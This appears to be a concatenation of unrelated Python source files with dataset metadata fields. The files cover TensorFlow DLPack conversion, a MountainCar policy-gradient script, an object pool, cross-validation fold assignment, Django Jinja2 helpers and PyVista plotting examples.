        # Other DLPack device types (OpenCL, Vulkan, ...) are not mapped.
        raise RuntimeError("Unsupported Device")
    tf_device = "/{}:{}".format(tf_device_type, tf_device_id)
    # The pointer travels as a CPU-side uint64 tensor...
    with tf.device("cpu:0"):
        ad_tensor = tf.constant([ptr], dtype=tf.uint64)
    # ...while the wrapping op itself runs on the tensor's real device.
    with tf.device(tf_device):
        tf_tensor = _from_dlpack(ad_tensor, T=tf.DType(dtype))
    return tf_tensor
| <filename>python/tfdlpack/core.py<gh_stars>10-100
# pylint: disable=no-name-in-module, invalid-name, no-member
"""core functions"""
import tensorflow as tf
from tensorflow.python.framework import load_library
from . import libinfo
from .capsule_api import to_capsule, get_capsule_address
# version number
__version__ = libinfo.__version__
# find lib
libname = libinfo.get_libname(tf.__version__)
dlpack_ops = load_library.load_op_library(libinfo.find_lib_path(libname)[0])
_to_dlpack_address = dlpack_ops.to_dlpack
_from_dlpack = dlpack_ops.from_dlpack
_get_device_and_dtype = dlpack_ops.get_device_and_dtype
_destruct_dlpack = dlpack_ops.destruct_dlpack
def _destruct_capsule(dlm_address):
with tf.device("cpu"):
_destruct_dlpack(dlm_address)
def to_dlpack(tf_tensor):
"""Convert the given tensorflow tensor to DLPack format.
"""
with tf.device(tf_tensor.device):
cap = to_capsule(_to_dlpack_address(tf_tensor))
return cap
def get_device_and_dtype(dl_capsule):
"""Get capsule's device and its corresponding dtype
First element is device type and second is device id (according to DLPack protocal)
Third element is the tf data type (can be convert to tf type by tf.DType(d) )
"""
ptr = get_capsule_address(dl_capsule)
with tf.device('/cpu:0'):
ad_tensor = tf.constant([ptr], dtype=tf.uint64)
return _get_device_and_dtype(ad_tensor).numpy()
def from_dlpack(dl_capsule):
"""Convert capsule to tf tensor"""
device_and_dtype = get_device_and_dtype(dl_capsule)
device = device_and_dtype[:2]
dtype = device_and_dtype[2]
ptr = get_capsule_address(dl_capsule, consume=True)
if device[0] == 1:
tf_device_type = "cpu"
tf_device_id = int(device[1])
elif device[0] == 2:
tf_device_type = "gpu"
tf_device_id = int(device[1])
else:
raise RuntimeError("Unsupported Device")
tf_device = "/{}:{}".format(tf_device_type, tf_device_id)
with tf.device("cpu:0"):
ad_tensor = tf.constant([ptr], dtype=tf.uint64)
with tf.device(tf_device):
tf_tensor = _from_dlpack(ad_tensor, T=tf.DType(dtype))
return tf_tensor
| en | 0.736157 | # pylint: disable=no-name-in-module, invalid-name, no-member core functions # version number # find lib Convert the given tensorflow tensor to DLPack format. Get capsule's device and its corresponding dtype First element is device type and second is device id (according to DLPack protocal) Third element is the tf data type (can be convert to tf type by tf.DType(d) ) Convert capsule to tf tensor | 2.403927 | 2 |
PolicyGradient/Car.py | TobiasLee/ReinforcementLearningPractice | 2 | 6617443 | import gym
from RL_agent import PolicyGradient
import matplotlib.pyplot as plt
threshold = -2000
render = False
env = gym.make("MountainCar-v0")
env.seed(1)
env = env.unwrapped
print(env.action_space)
print(env.observation_space)
print(env.observation_space.high)
print(env.observation_space.low)
RL = PolicyGradient(
n_actions=env.action_space.n,
n_features = env.observation_space.shape[0],
lr = 0.02,
reward_decay = 0.995
)
for i in range(1000):
observation = env.reset()
while True:
if render:
env.render()
action = RL.choose_action(observation)
observation_, reward, done, info = env.step(action)
RL.store_transition(observation, action, reward)
if done: # episode finished
ep_rs_sum = sum(RL.ep_rs)
if "running_reward" not in globals():
running_reward = ep_rs_sum
else:
running_reward = running_reward * 0.99 + ep_rs_sum * 0.01
if running_reward > threshold:
render = True
print("episode: ", i, " reward: ", int(running_reward))
vt = RL.learn()
if i == 30:
plt.plot(vt)
plt.ylabel('normalized state-action value')
plt.show()
break
observation = observation_ # update states | import gym
from RL_agent import PolicyGradient
import matplotlib.pyplot as plt
threshold = -2000
render = False
env = gym.make("MountainCar-v0")
env.seed(1)
env = env.unwrapped
print(env.action_space)
print(env.observation_space)
print(env.observation_space.high)
print(env.observation_space.low)
RL = PolicyGradient(
n_actions=env.action_space.n,
n_features = env.observation_space.shape[0],
lr = 0.02,
reward_decay = 0.995
)
for i in range(1000):
observation = env.reset()
while True:
if render:
env.render()
action = RL.choose_action(observation)
observation_, reward, done, info = env.step(action)
RL.store_transition(observation, action, reward)
if done: # episode finished
ep_rs_sum = sum(RL.ep_rs)
if "running_reward" not in globals():
running_reward = ep_rs_sum
else:
running_reward = running_reward * 0.99 + ep_rs_sum * 0.01
if running_reward > threshold:
render = True
print("episode: ", i, " reward: ", int(running_reward))
vt = RL.learn()
if i == 30:
plt.plot(vt)
plt.ylabel('normalized state-action value')
plt.show()
break
observation = observation_ # update states | en | 0.940109 | # episode finished # update states | 2.877755 | 3 |
object_pool/__init__.py | btmorex/object_pool | 12 | 6617444 | from contextlib import contextmanager
import threading
from time import time
__version__ = 0.2
class ObjectPoolTimeout(RuntimeError):
    """Raised by ObjectPool.get() when no item becomes available in time."""
    pass


class ObjectPool(object):
    """A thread-safe, lazily populated pool of reusable objects.

    Items are created on demand by the ``create`` factory, up to
    ``max_size`` of them (unbounded when ``max_size`` is None).  Callers
    borrow with :meth:`get` or the :meth:`item` context manager and must
    return items with :meth:`put`; an item that is never returned
    permanently reduces the pool's effective capacity.
    """

    def __init__(self, create, max_size=None):
        self._create = create        # zero-argument factory for new items
        self._max_size = max_size    # cap on total items ever created (None = unlimited)
        self._size = 0               # number of items created so far
        self._items = []             # idle items, borrowed LIFO
        self._mutex = threading.Lock()
        self._item_available = threading.Condition(self._mutex)

    def get(self, timeout=None):
        """Borrow an item, creating one if capacity allows, else wait.

        Args:
            timeout: seconds to wait for an item; None waits indefinitely.

        Raises:
            ObjectPoolTimeout: if ``timeout`` elapses with no item returned.
        """
        from time import monotonic

        with self._mutex:
            if not self._items and (self._max_size is None
                                    or self._size < self._max_size):
                # Room to grow: build a new item instead of waiting.
                # Create before incrementing so a failing factory does not
                # consume capacity.
                item = self._create()
                self._size += 1
                return item
            # The original measured the deadline with time.time(); use the
            # monotonic clock so system clock adjustments cannot stretch or
            # truncate the wait.
            deadline = None if timeout is None else monotonic() + timeout
            while not self._items:
                remaining = None
                if deadline is not None:
                    remaining = deadline - monotonic()
                    if remaining <= 0.0:
                        raise ObjectPoolTimeout
                self._item_available.wait(remaining)
            return self._items.pop()

    def put(self, item):
        """Return a borrowed item to the pool and wake one waiting getter."""
        with self._mutex:
            self._items.append(item)
            self._item_available.notify()

    @contextmanager
    def item(self):
        """Context manager that borrows an item and always returns it."""
        item = self.get()
        try:
            yield item
        finally:
            self.put(item)
| from contextlib import contextmanager
import threading
from time import time
__version__ = 0.2
class ObjectPoolTimeout(RuntimeError):
pass
class ObjectPool(object):
def __init__(self, create, max_size=None):
self._create = create
self._max_size = max_size
self._size = 0
self._items = []
self._mutex = threading.Lock()
self._item_available = threading.Condition(self._mutex)
def get(self, timeout=None):
with self._mutex:
if not self._items and (self._max_size is None or self._size < self._max_size):
item = self._create()
self._size += 1
else:
if timeout is not None:
end = time() + timeout
while not self._items:
remaining = timeout
if timeout is not None:
remaining = end - time()
if remaining <= 0.0:
raise ObjectPoolTimeout
self._item_available.wait(remaining)
item = self._items.pop()
return item
def put(self, item):
with self._mutex:
self._items.append(item)
self._item_available.notify()
@contextmanager
def item(self):
item = self.get()
try:
yield item
finally:
self.put(item)
| none | 1 | 3.097675 | 3 | |
src/misc/fold.py | Ynakatsuka/nishika-22 | 4 | 6617445 | <gh_stars>1-10
import os
import pprint
import sys
import hydra
import pandas as pd
from hydra.utils import instantiate
from omegaconf import DictConfig, OmegaConf
sys.path.append("src/")
@hydra.main(config_path="../../config", config_name="default")
def main(config: DictConfig) -> None:
    """Assign cross-validation fold ids to the training data and save a CSV.

    Driven entirely by the hydra config: ``config.fold`` selects the input
    CSV, the splitter class, the fold column name and the output filename;
    ``config.competition`` names the target column and (optionally) a group
    column for group-aware splitting.
    """
    # Echo the fully resolved config for reproducibility of the run.
    print("-" * 100)
    pprint.PrettyPrinter(indent=2).pprint(
        OmegaConf.to_container(config, resolve=True)
    )
    fold_column = config.fold.fold_column
    train = pd.read_csv(config.fold.input_path)
    print(train.head(3))
    print(train.shape)
    y = train[config.competition.target_column]
    # groups stays None unless a group column is configured; sklearn-style
    # splitters that don't use groups simply ignore the argument.
    groups = None
    if hasattr(config.competition, "group_column") and (
        config.competition.group_column is not None
    ):
        groups = train[config.competition.group_column]
    # Tag every row with the index of the split in which it is validation.
    train[fold_column] = 0
    kfold = instantiate(config.fold.fold)
    for f, (_, valid_index) in enumerate(
        kfold.split(train, y=y, groups=groups)
    ):
        train.loc[valid_index, fold_column] = f
    path = os.path.join(config.save_dir, config.fold.csv_filename)
    train.to_csv(path, index=False)
if __name__ == "__main__":
main()
| import os
import pprint
import sys
import hydra
import pandas as pd
from hydra.utils import instantiate
from omegaconf import DictConfig, OmegaConf
sys.path.append("src/")
@hydra.main(config_path="../../config", config_name="default")
def main(config: DictConfig) -> None:
print("-" * 100)
pprint.PrettyPrinter(indent=2).pprint(
OmegaConf.to_container(config, resolve=True)
)
fold_column = config.fold.fold_column
train = pd.read_csv(config.fold.input_path)
print(train.head(3))
print(train.shape)
y = train[config.competition.target_column]
groups = None
if hasattr(config.competition, "group_column") and (
config.competition.group_column is not None
):
groups = train[config.competition.group_column]
# split
train[fold_column] = 0
kfold = instantiate(config.fold.fold)
for f, (_, valid_index) in enumerate(
kfold.split(train, y=y, groups=groups)
):
train.loc[valid_index, fold_column] = f
path = os.path.join(config.save_dir, config.fold.csv_filename)
train.to_csv(path, index=False)
if __name__ == "__main__":
main() | none | 1 | 2.464822 | 2 | |
starter_app/utils/jinja.py | reorx/django_starter_pack | 2 | 6617446 | import jinja2
from jinja2 import PackageLoader
from django.utils.timezone import template_localtime
from django.http import HttpResponse
from django.views.generic import View
root_pkg_name = 'starter_app'
template_dir_name = 'templates'
def get_jinja2_env():
loader = PackageLoader(root_pkg_name, package_path=template_dir_name)
env = jinja2.Environment(loader=loader)
env.filters.update({
'localtime': template_localtime,
})
env.globals.update({
'localtime': template_localtime,
})
# env.filters['round_str'] = round_str
return env
jinja2_env = get_jinja2_env()
def get_template(name):
return jinja2_env.get_template(name)
# jinja2 equivant of django.shortcuts.render
def render(request, template_name, context: dict, status=200):
return HttpResponse(
get_template(template_name).render(**context),
status=status,
)
class WebView(View):
template_name = ''
def render_to_response(self, template_name=None, context=None, status=200):
if context is None:
context = {}
if not template_name:
template_name = self.template_name
# add functions here
# context.update(
# foo=foo,
# )
return render(
self.request,
template_name,
context,
status=status,
)
| import jinja2
from jinja2 import PackageLoader
from django.utils.timezone import template_localtime
from django.http import HttpResponse
from django.views.generic import View
root_pkg_name = 'starter_app'
template_dir_name = 'templates'
def get_jinja2_env():
loader = PackageLoader(root_pkg_name, package_path=template_dir_name)
env = jinja2.Environment(loader=loader)
env.filters.update({
'localtime': template_localtime,
})
env.globals.update({
'localtime': template_localtime,
})
# env.filters['round_str'] = round_str
return env
jinja2_env = get_jinja2_env()
def get_template(name):
return jinja2_env.get_template(name)
# jinja2 equivant of django.shortcuts.render
def render(request, template_name, context: dict, status=200):
return HttpResponse(
get_template(template_name).render(**context),
status=status,
)
class WebView(View):
template_name = ''
def render_to_response(self, template_name=None, context=None, status=200):
if context is None:
context = {}
if not template_name:
template_name = self.template_name
# add functions here
# context.update(
# foo=foo,
# )
return render(
self.request,
template_name,
context,
status=status,
)
| en | 0.169769 | # env.filters['round_str'] = round_str # jinja2 equivant of django.shortcuts.render # add functions here # context.update( # foo=foo, # ) | 2.229072 | 2 |
tests/__init__.py | oscarlorentzon/repstruct | 2 | 6617447 | <reponame>oscarlorentzon/repstruct
__author__ = 'osclor'
| __author__ = 'osclor' | none | 1 | 1.050442 | 1 | |
reseller_cashback/authentication/apps.py | cesarbruschetta/reseller-cashback | 1 | 6617448 | from django.apps import AppConfig
class AuthConfig(AppConfig): # type: ignore
name = 'authentication'
| from django.apps import AppConfig
class AuthConfig(AppConfig): # type: ignore
name = 'authentication'
| it | 0.190853 | # type: ignore | 1.239366 | 1 |
layout/urls.py | AsianMiracle/django-base-template | 26 | 6617449 | <gh_stars>10-100
"""urlconf for the layout application"""
from django.conf.urls import url
from layout.views import home
urlpatterns =[
url(r'^$', home),
]
| """urlconf for the layout application"""
from django.conf.urls import url
from layout.views import home
urlpatterns =[
url(r'^$', home),
] | en | 0.836434 | urlconf for the layout application | 1.422279 | 1 |
locale/pot/api/plotting/_autosummary/pyvista-Plotter-add_mesh-1.py | tkoyama010/pyvista-doc-translations | 4 | 6617450 | # Add a sphere to the plotter and show it with a custom scalar
# bar title.
#
import pyvista
sphere = pyvista.Sphere()
sphere['Data'] = sphere.points[:, 2]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(sphere,
scalar_bar_args={'title': 'Z Position'})
plotter.show()
#
# Plot using RGB on a single cell. Note that since the number of
# points and the number of cells are identical, we have to pass
# ``preference='cell'``.
#
import pyvista
import numpy as np
vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
mesh = pyvista.PolyData(vertices, faces)
mesh.cell_data['colors'] = [[255, 255, 255],
[0, 255, 0],
[0, 0, 255],
[255, 0, 0]]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='cell')
plotter.camera_position='xy'
plotter.show()
#
# Note how this varies from ``preference=='point'``. This is
# because each point is now being individually colored, versus
# in ``preference=='point'``, each cell face is individually
# colored.
#
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='point')
plotter.camera_position='xy'
plotter.show()
| # Add a sphere to the plotter and show it with a custom scalar
# bar title.
#
import pyvista
sphere = pyvista.Sphere()
sphere['Data'] = sphere.points[:, 2]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(sphere,
scalar_bar_args={'title': 'Z Position'})
plotter.show()
#
# Plot using RGB on a single cell. Note that since the number of
# points and the number of cells are identical, we have to pass
# ``preference='cell'``.
#
import pyvista
import numpy as np
vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
mesh = pyvista.PolyData(vertices, faces)
mesh.cell_data['colors'] = [[255, 255, 255],
[0, 255, 0],
[0, 0, 255],
[255, 0, 0]]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='cell')
plotter.camera_position='xy'
plotter.show()
#
# Note how this varies from ``preference=='point'``. This is
# because each point is now being individually colored, versus
# in ``preference=='point'``, each cell face is individually
# colored.
#
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='point')
plotter.camera_position='xy'
plotter.show()
| en | 0.888998 | # Add a sphere to the plotter and show it with a custom scalar # bar title. # # # Plot using RGB on a single cell. Note that since the number of # points and the number of cells are identical, we have to pass # ``preference='cell'``. # # # Note how this varies from ``preference=='point'``. This is # because each point is now being individually colored, versus # in ``preference=='point'``, each cell face is individually # colored. # | 3.121056 | 3 |